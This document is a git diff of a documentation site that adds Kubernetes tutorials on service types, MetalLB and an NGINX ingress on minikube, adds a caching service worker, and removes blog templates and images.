of DNS records assigned to it include an A record to match its IP. This is very useful for exposing microservices running inside the same Kubernetes cluster to each other. 
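+
+A quick way to see those DNS records, assuming the `hello` service created in the example that follows and the default `cluster.local` domain (the `dns-test` pod name and busybox image are just for illustration):
+
+```sh
+# Every ClusterIP service gets an A record of the form
+# <service>.<namespace>.svc.cluster.local
+kubectl run -i --tty --rm dns-test --image=busybox:1.36 --restart=Never -- \
+  nslookup hello.default.svc.cluster.local
+```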
+ +```sh +kubectl run hello --image=paulczar/hello-world +deployment "hello" created +``` + +```sh +kubectl expose deployment hello --port=8080 --type=ClusterIP +service "hello" exposed +$ kubectl run -i --tty --rm debug --image=alpine \ + --restart=Never -- wget -qO - hello:8080 +hello worldhello world! +$ kubectl delete service hello +service "hello" deleted +``` + +Since KubeDNS is enabled in minikube by default you can access the service via DNS using the name of the service. + +### NodePort + +NodePort builds on top of ClusterIP to create a mapping from each Worker Node’s static IP on a specified (or Kubernetes chosen) Port. A Service exposed as a NodePort can be accessed via :. This ServiceType can be useful when developing applications with minikube or for exposing a specific Port to an application via an unmanaged load balancer or round robin DNS. + +```sh +$ kubectl expose deployment hello --port=8080 --type=NodePort +service "hello" exposed +$ kubectl get service hello +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +hello NodePort 10.0.0.231 8080:30259/TCP 21s +$ minikube ip +192.168.99.100 +$ curl 192.168.99.100:30259 +hello worldhello world! +$ kubectl delete service hello +service "hello" deleted +``` + +### LoadBalancer + +LoadBalancer builds on top of NodePort and is used to automatically configure a supported external Load Balancer (for instance an ELB in Amazon) to route traffic through to the NodePort of the Service. This is the most versatile of the ServiceTypes but requires that you have a supported Load Balancer in your infrastructure of which most major cloud providers have. +In minikube this would produce the same result as a NodePort as minikube does not have a load balancer. However we can demonstrate it on Google Cloud quite easily if you have an account: + +```sh +$ kubectl run hello --image=paulczar/hello-world +deployment "hello" created +$ kubectl expose deployment hello --port=8080 --type=LoadBalancer +service "hello" exposed +$ kubectl get service +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +hello LoadBalancer 10.11.251.34 35.192.25.113 8080:32107/TCP 2m +$ curl 35.192.25.113:8080 +hello worldhello world! 
+``` + +```sh +➜ k8s101 git:(main) βœ— minikube addons list +|-----------------------------|----------|--------------|--------------------------------| +| ADDON NAME | PROFILE | STATUS | MAINTAINER | +|-----------------------------|----------|--------------|--------------------------------| +| ambassador | minikube | disabled | 3rd party (Ambassador) | +| auto-pause | minikube | disabled | Google | +| cloud-spanner | minikube | disabled | Google | +| csi-hostpath-driver | minikube | disabled | Kubernetes | +| dashboard | minikube | enabled βœ… | Kubernetes | +| default-storageclass | minikube | enabled βœ… | Kubernetes | +| efk | minikube | disabled | 3rd party (Elastic) | +| freshpod | minikube | disabled | Google | +| gcp-auth | minikube | disabled | Google | +| gvisor | minikube | disabled | Google | +| headlamp | minikube | disabled | 3rd party (kinvolk.io) | +| helm-tiller | minikube | disabled | 3rd party (Helm) | +| inaccel | minikube | disabled | 3rd party (InAccel | +| | | | [info@inaccel.com]) | +| ingress | minikube | disabled | Kubernetes | +| ingress-dns | minikube | disabled | Google | +| istio | minikube | disabled | 3rd party (Istio) | +| istio-provisioner | minikube | disabled | 3rd party (Istio) | +| kong | minikube | disabled | 3rd party (Kong HQ) | +| kubevirt | minikube | disabled | 3rd party (KubeVirt) | +| logviewer | minikube | disabled | 3rd party (unknown) | +| metallb | minikube | disabled | 3rd party (MetalLB) | +| metrics-server | minikube | enabled βœ… | Kubernetes | +| nvidia-driver-installer | minikube | disabled | Google | +| nvidia-gpu-device-plugin | minikube | disabled | 3rd party (Nvidia) | +| olm | minikube | disabled | 3rd party (Operator Framework) | +| pod-security-policy | minikube | disabled | 3rd party (unknown) | +| portainer | minikube | disabled | 3rd party (Portainer.io) | +| registry | minikube | disabled | Google | +| registry-aliases | minikube | disabled | 3rd party (unknown) | +| registry-creds | minikube | disabled | 3rd party (UPMC Enterprises) | +| storage-provisioner | minikube | enabled βœ… | Google | +| storage-provisioner-gluster | minikube | disabled | 3rd party (Gluster) | +| volumesnapshots | minikube | disabled | Kubernetes | +|-----------------------------|----------|--------------|--------------------------------| +πŸ’‘ To see addons list for other profiles use: `minikube addons -p name list` +➜ k8s101 git:(main) βœ— minikube addons enable metallb +❗ metallb is a 3rd party addon and is not maintained or verified by minikube maintainers, enable at your own risk. +❗ metallb does not currently have an associated maintainer. 
+ β–ͺ Using image docker.io/metallb/speaker:v0.9.6 + β–ͺ Using image docker.io/metallb/controller:v0.9.6 +🌟 The 'metallb' addon is enabled +➜ k8s101 git:(main) βœ— +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get ns +NAME STATUS AGE +default Active 116d +kube-node-lease Active 116d +kube-public Active 116d +kube-system Active 116d +kubernetes-dashboard Active 46h +metallb-system Active 155m +➜ k8s101 git:(main) βœ— kubectl get all -n metallb-system +NAME READY STATUS RESTARTS AGE +pod/controller-55496b5cd7-p4k6g 1/1 Running 0 155m +pod/speaker-8l8kb 1/1 Running 0 155m + +NAME DESIRED CURRENT READY UP-TO-DATE AVAILABLE NODE SELECTOR AGE +daemonset.apps/speaker 1 1 1 1 1 beta.kubernetes.io/os=linux 155m + +NAME READY UP-TO-DATE AVAILABLE AGE +deployment.apps/controller 1/1 1 1 155m + +NAME DESIRED CURRENT READY AGE +replicaset.apps/controller-55496b5cd7 1 1 1 155m +``` + +``` +➜ k8s101 git:(main) βœ— minikube ip +192.168.49.2 +➜ k8s101 git:(main) βœ— minikube addons configure metallb +-- Enter Load Balancer Start IP: 192.168.49.100 +-- Enter Load Balancer End IP: 192.168.49.120 + β–ͺ Using image docker.io/metallb/controller:v0.9.6 + β–ͺ Using image docker.io/metallb/speaker:v0.9.6 +βœ… metallb was successfully configured +➜ k8s101 git:(main) βœ— +``` + +#### create ngnix deployment via Loadbalancer + + +```sh +apiVersion: v1 +kind: Service +metadata: + name: nginx-svc +spec: + selector: + app: nginx + ports: + - protocol: TCP + port: 80 + targetPort: 80 + type: LoadBalancer +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: nginx-deployment + labels: + app: nginx +spec: + replicas: 1 + selector: + matchLabels: + app: nginx + template: + metadata: + labels: + app: nginx + spec: + containers: + - name: nginx + image: nginx:1.14.2 + ports: + - containerPort: 80 + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f ngnix-metallb.yaml +service/nginx-svc created +deployment.apps/nginx-deployment created + +➜ k8s101 git:(main) βœ— kubectl get po,svc +NAME READY STATUS RESTARTS AGE +pod/2048-deployment-9ccbf58bd-57tng 1/1 Running 0 6h18m +pod/2048-deployment-9ccbf58bd-78pnr 1/1 Running 0 6h18m +pod/2048-deployment-9ccbf58bd-mbfrt 1/1 Running 0 6h18m +pod/2048-deployment-9ccbf58bd-tfcnd 1/1 Running 0 6h18m +pod/2048-deployment-9ccbf58bd-trxqw 1/1 Running 0 6h18m +pod/kube-ops-view-5b596b7c7d-z2p2v 1/1 Running 0 13h +pod/kube-ops-view-redis-6dc75f67cd-klhpf 1/1 Running 0 13h +pod/lab-nginx-84756b7fc4-4qctt 1/1 Running 0 13h +pod/lab-nginx-84756b7fc4-rhg4m 1/1 Running 0 13h +pod/label-nginx-example-5f8bc677b9-6trt6 1/1 Running 0 13h +pod/my-nginx-deploy-5c9989fcf4-pqpgj 1/1 Running 0 4h23m +pod/my-nginx-deploy-5c9989fcf4-zkq8p 1/1 Running 0 4h23m +pod/my-release-kubeview-f7447cf6c-2w85w 1/1 Running 0 13h +pod/nginx-1-ff5997cdf-kpff9 1/1 Running 0 13h +pod/nginx-deployment-7fb96c846b-cm296 1/1 Running 0 80s +pod/nginx-lab-1-84756b7fc4-77kvz 1/1 Running 0 13h +pod/nginx-lab-1-84756b7fc4-r9cmt 1/1 Running 0 13h +pod/nginx-lab-1-84756b7fc4-sqbf4 1/1 Running 0 13h + +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +service/kubernetes ClusterIP 10.96.0.1 443/TCP 6h46m +service/my-service NodePort 10.103.55.123 80:30007/TCP 3h22m +service/myservice NodePort 10.111.94.141 80:31487/TCP 6h18m +service/nginx-svc LoadBalancer 10.104.216.130 192.168.49.100 80:31150/TCP 80s +➜ k8s101 git:(main) βœ— +``` +```sh +k8s101 git:(main) βœ— minikube tunnel +βœ… Tunnel successfully started + +πŸ“Œ NOTE: Please do not close this terminal as this process must stay alive for the tunnel to be accessible ... 
+ +❗ The service/ingress nginx-svc requires privileged ports to be exposed: [80] +πŸ”‘ sudo permission will be asked for it. +πŸƒ Starting tunnel for service nginx-svc. +ΒΈ^Cβœ‹ Stopped tunnel for service nginx-svc. +``` + +#### open localhost on 80 port + +localhost:80 diff --git a/content/en/k8s/c9.Ingress-Controller 2.md b/content/en/k8s/c9.Ingress-Controller 2.md new file mode 100644 index 0000000..f575791 --- /dev/null +++ b/content/en/k8s/c9.Ingress-Controller 2.md @@ -0,0 +1,159 @@ +--- +title: "Ingress Controller" +description: " kubernetes Service " +slug: "Ingress-Controller" +--- + +#### enable ingress addon + +```sh +k8s101 git:(main) βœ— minikube addons enable ingress +πŸ’‘ ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub. +You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS +πŸ’‘ After the addon is enabled, please run "minikube tunnel" and your ingress resources would be available at "127.0.0.1" + β–ͺ Using image k8s.gcr.io/ingress-nginx/kube-webhook-certgen:v1.1.1 + β–ͺ Using image k8s.gcr.io/ingress-nginx/controller:v1.2.1 + β–ͺ Using image k8s.gcr.io/ingress-nginx/kube-webhook-certgen:v1.1.1 +πŸ”Ž Verifying ingress addon... +🌟 The 'ingress' addon is enabled +➜ k8s101 git:(main) βœ— +``` +#### verify ngnix controller running + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -n ingress-nginx +NAME READY STATUS RESTARTS AGE +ingress-nginx-admission-create-fxzbs 0/1 Completed 0 4m7s +ingress-nginx-admission-patch-jw98n 0/1 Completed 1 4m7s +ingress-nginx-controller-5959f988fd-tv8x8 1/1 Running 0 4m7s + +``` +#### verify all pods running + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -n kube-system +NAME READY STATUS RESTARTS AGE +coredns-565d847f94-bl9qz 1/1 Running 0 12h +etcd-minikube 1/1 Running 0 12h +kube-apiserver-minikube 1/1 Running 0 12h +kube-controller-manager-minikube 1/1 Running 0 12h +kube-proxy-qj7s7 1/1 Running 0 12h +kube-scheduler-minikube 1/1 Running 0 12h +storage-provisioner 1/1 Running 2 (12h ago) 12h + +``` + +#### Deploy Hello World App + +```sh + +➜ k8s101 git:(main) βœ— kubectl create deployment web --image=gcr.io/google-samples/hello-app:1.0 +deployment.apps/web created +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl expose deployment web --type=NodePort --port=8080 +service/web exposed +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get service web +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +web NodePort 10.100.132.142 8080:30646/TCP 41s + +``` + +```sh +➜ k8s101 git:(main) βœ— minikube service web --url +http://127.0.0.1:51575 +❗ Because you are using a Docker driver on darwin, the terminal needs to be open to run it. +``` + +output +``` +Hello, world! +Version: 1.0.0 +Hostname: web-84fb9498c7-zx2k4 +``` + +### Ingress that sends traffic to your Service via hello-world.info. 
+ +```yaml +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: example-ingress + annotations: + nginx.ingress.kubernetes.io/rewrite-target: /$1 +spec: + rules: + - host: hello-world.info + http: + paths: + - path: / + pathType: Prefix + backend: + service: + name: web + port: + number: 8080 + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f example-ingress.yaml +ingress.networking.k8s.io/example-ingress created +``` + +#### verify IP addree + +```sh +➜ k8s101 git:(main) βœ— kubectl get ingress +NAME CLASS HOSTS ADDRESS PORTS AGE +example-ingress nginx hello-world.info 192.168.49.2 80 18m +➜ k8s101 git:(main) βœ— +``` + + +```sh +➜ k8s101 git:(main) βœ— echo "127.0.0.1 hello-world.info" | sudo tee -a /etc/hosts +127.0.0.1 hello-world.info +➜ k8s101 git:(main) βœ— kubectl apply -f example-ingress.yaml +ingress.networking.k8s.io/example-ingress unchanged +``` +#### add path + +```yaml + - path: /v2 + pathType: Prefix + backend: + service: + name: web2 + port: + number: 8080 + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f example-ingress.yaml +ingress.networking.k8s.io/example-ingress configured +``` + +```sh +➜ k8s101 git:(main) βœ— minikube tunnel +βœ… Tunnel successfully started + +πŸ“Œ NOTE: Please do not close this terminal as this process must stay alive for the tunnel to be accessible ... + +❗ The service/ingress example-ingress requires privileged ports to be exposed: [80 443] +πŸ”‘ sudo permission will be asked for it. +πŸƒ Starting tunnel for service example-ingress. + +``` + +### check output + +```sh +http://hello-world.info/ +http://hello-world.info/v2 +``` \ No newline at end of file diff --git a/layouts/partials/blog/content.html b/layouts/partials/blog/content.html deleted file mode 100644 index 2972bbf..0000000 --- a/layouts/partials/blog/content.html +++ /dev/null @@ -1,14 +0,0 @@ -{{ $posts := where site.RegularPages "Section" "blog" }} -
-
-
-
-
-
- {{ .Content }} -
-
-
-
-
-
\ No newline at end of file diff --git a/layouts/partials/blog/cover.html b/layouts/partials/blog/cover.html deleted file mode 100644 index e69de29..0000000 diff --git a/layouts/partials/blog/hero.html b/layouts/partials/blog/hero.html deleted file mode 100644 index c564e64..0000000 --- a/layouts/partials/blog/hero.html +++ /dev/null @@ -1,19 +0,0 @@ -{{ $isPost := ne .File.BaseFileName "_index" }} -
-
-
-
-

- {{ .Title }} -

-
- - {{ if $isPost }} - {{ $date := dateFormat "January 2, 2006" .Date }} -

- {{ .Params.author }} | {{ $date }} -

- {{ end }} -
-
-
diff --git a/layouts/partials/blog/post-list.html b/layouts/partials/blog/post-list.html deleted file mode 100644 index 8ba62c9..0000000 --- a/layouts/partials/blog/post-list.html +++ /dev/null @@ -1,23 +0,0 @@ -{{ $posts := where site.RegularPages "Section" "blog" }} -
-
-
- {{ range $posts }} - {{ $date := dateFormat "January 2, 2006" .Date }} - - {{ end }} -
-
-
\ No newline at end of file diff --git a/public/sw 2.js b/public/sw 2.js new file mode 100644 index 0000000..e13c4c6 --- /dev/null +++ b/public/sw 2.js @@ -0,0 +1,61 @@ +const cacheName = 'docura-{{ now.Format "2006-01-02" }}'; +const staticAssets = [ + './', + './index.html', + './manifest.json', + './docs/**/*', + './font/*', + './img/icon/favicon.ico', + './img/icon/icon-16.png', + './img/icon/icon-32.png', + './img/icon/icon-180.png', + './img/icon/icon-192.png', + './img/icon/icon-512.png', + './img/icon/icon-vector.svg', + './img/icon/maskable-icon-192.png', + './img/icon/maskable-icon-512.png', + './js/base.min.js', + './js/component/docsearch.min.js', + './scss/base.css', + './scss/component/docsearch.css', + './scss/home.css', +]; + +self.addEventListener('install', async e => { + const cache = await caches.open(cacheName); + await cache.addAll(staticAssets); + return self.skipWaiting(); +}); + +self.addEventListener('activate', e => { + self.clients.claim(); +}); + +self.addEventListener('fetch', async e => { + const req = e.request; + const url = new URL(req.url); + + if (url.origin === location.origin) { + e.respondWith(cacheFirst(req)); + } else { + e.respondWith(networkFirst(req)); + } +}); + +async function cacheFirst(req) { + const cache = await caches.open(cacheName); + const cached = await cache.match(req); + return cached || fetch(req); +} + +async function networkFirst(req) { + const cache = await caches.open(cacheName); + try { + const fresh = await fetch(req); + cache.put(req, fresh.clone()); + return fresh; + } catch (e) { + const cached = await cache.match(req); + return cached; + } +} \ No newline at end of file diff --git a/static/img/icon/3.png b/static/img/icon/3.png deleted file mode 100644 index c0546dd..0000000 Binary files a/static/img/icon/3.png and /dev/null differ diff --git a/static/img/icon/Cloudnativefolks-Community-Logo-D7.png b/static/img/icon/Cloudnativefolks-Community-Logo-D7.png deleted file mode 100644 index b1cc5ab..0000000 Binary files a/static/img/icon/Cloudnativefolks-Community-Logo-D7.png and /dev/null differ diff --git a/static/img/icon/Linux Collective-2.png b/static/img/icon/Linux Collective-2.png deleted file mode 100644 index 0ce9256..0000000 Binary files a/static/img/icon/Linux Collective-2.png and /dev/null differ diff --git a/static/img/icon/Linux Collective.png b/static/img/icon/Linux Collective.png deleted file mode 100644 index 4686f82..0000000 Binary files a/static/img/icon/Linux Collective.png and /dev/null differ diff --git a/static/img/icon/button.png b/static/img/icon/button.png deleted file mode 100644 index 8fd958b..0000000 Binary files a/static/img/icon/button.png and /dev/null differ diff --git a/static/img/icon/favicon.ico b/static/img/icon/favicon.ico deleted file mode 100644 index 4f47bdc..0000000 Binary files a/static/img/icon/favicon.ico and /dev/null differ diff --git a/static/img/icon/icon-16.png b/static/img/icon/icon-16.png deleted file mode 100644 index c55011a..0000000 Binary files a/static/img/icon/icon-16.png and /dev/null differ diff --git a/static/img/icon/icon-180.png b/static/img/icon/icon-180.png deleted file mode 100644 index 694fd85..0000000 Binary files a/static/img/icon/icon-180.png and /dev/null differ diff --git a/static/img/icon/icon-192.png b/static/img/icon/icon-192.png deleted file mode 100644 index a47b1d8..0000000 Binary files a/static/img/icon/icon-192.png and /dev/null differ diff --git a/static/img/icon/icon-32.png b/static/img/icon/icon-32.png deleted file mode 100644 index 
afaee33..0000000 Binary files a/static/img/icon/icon-32.png and /dev/null differ diff --git a/static/img/icon/icon-512.png b/static/img/icon/icon-512.png deleted file mode 100644 index d69620b..0000000 Binary files a/static/img/icon/icon-512.png and /dev/null differ diff --git a/static/img/icon/icon-vector.svg b/static/img/icon/icon-vector.svg deleted file mode 100644 index fc8a34c..0000000 --- a/static/img/icon/icon-vector.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/static/img/icon/level-Layers-Abstraction.png b/static/img/icon/level-Layers-Abstraction.png deleted file mode 100644 index 7c18108..0000000 Binary files a/static/img/icon/level-Layers-Abstraction.png and /dev/null differ diff --git a/static/img/icon/linux-components.png b/static/img/icon/linux-components.png deleted file mode 100644 index 250a5c8..0000000 Binary files a/static/img/icon/linux-components.png and /dev/null differ diff --git a/static/img/icon/linux-subsystem.png b/static/img/icon/linux-subsystem.png deleted file mode 100644 index 0aabc18..0000000 Binary files a/static/img/icon/linux-subsystem.png and /dev/null differ diff --git a/static/img/icon/linux-subsytem.png b/static/img/icon/linux-subsytem.png deleted file mode 100644 index 0114619..0000000 Binary files a/static/img/icon/linux-subsytem.png and /dev/null differ diff --git a/static/img/icon/maskable-icon-192.png b/static/img/icon/maskable-icon-192.png deleted file mode 100644 index c9f099c..0000000 Binary files a/static/img/icon/maskable-icon-192.png and /dev/null differ diff --git a/static/img/icon/maskable-icon-512.png b/static/img/icon/maskable-icon-512.png deleted file mode 100644 index 281dae9..0000000 Binary files a/static/img/icon/maskable-icon-512.png and /dev/null differ diff --git a/static/img/icon/mono-micro-os.png b/static/img/icon/mono-micro-os.png deleted file mode 100644 index 20a2019..0000000 Binary files a/static/img/icon/mono-micro-os.png and /dev/null differ diff --git a/static/img/logos/3.png b/static/img/logos/3.png deleted file mode 100644 index ff0b3b4..0000000 Binary files a/static/img/logos/3.png and /dev/null differ diff --git a/static/img/logos/Cloudnativefolks-Community-Logo-D5.png b/static/img/logos/Cloudnativefolks-Community-Logo-D5.png deleted file mode 100644 index 592f59b..0000000 Binary files a/static/img/logos/Cloudnativefolks-Community-Logo-D5.png and /dev/null differ diff --git a/static/img/logos/Cloudnativefolks-Community-Logo-D7 2.png b/static/img/logos/Cloudnativefolks-Community-Logo-D7 2.png deleted file mode 100644 index b1cc5ab..0000000 Binary files a/static/img/logos/Cloudnativefolks-Community-Logo-D7 2.png and /dev/null differ diff --git a/static/img/logos/KubeDaily-3.png b/static/img/logos/KubeDaily-3.png deleted file mode 100755 index 1abdada..0000000 Binary files a/static/img/logos/KubeDaily-3.png and /dev/null differ diff --git a/static/img/logos/KubeDaily.jpg b/static/img/logos/KubeDaily.jpg deleted file mode 100755 index ef716e4..0000000 Binary files a/static/img/logos/KubeDaily.jpg and /dev/null differ diff --git a/static/img/logos/profile-pic-2.png b/static/img/logos/profile-pic-2.png deleted file mode 100644 index b8bc081..0000000 Binary files a/static/img/logos/profile-pic-2.png and /dev/null differ diff --git a/static/img/logos/profile-pic-3.png b/static/img/logos/profile-pic-3.png deleted file mode 100644 index e799fe8..0000000 Binary files a/static/img/logos/profile-pic-3.png and /dev/null differ diff --git a/static/img/logos/profile-pic-4.png 
b/static/img/logos/profile-pic-4.png deleted file mode 100644 index e735671..0000000 Binary files a/static/img/logos/profile-pic-4.png and /dev/null differ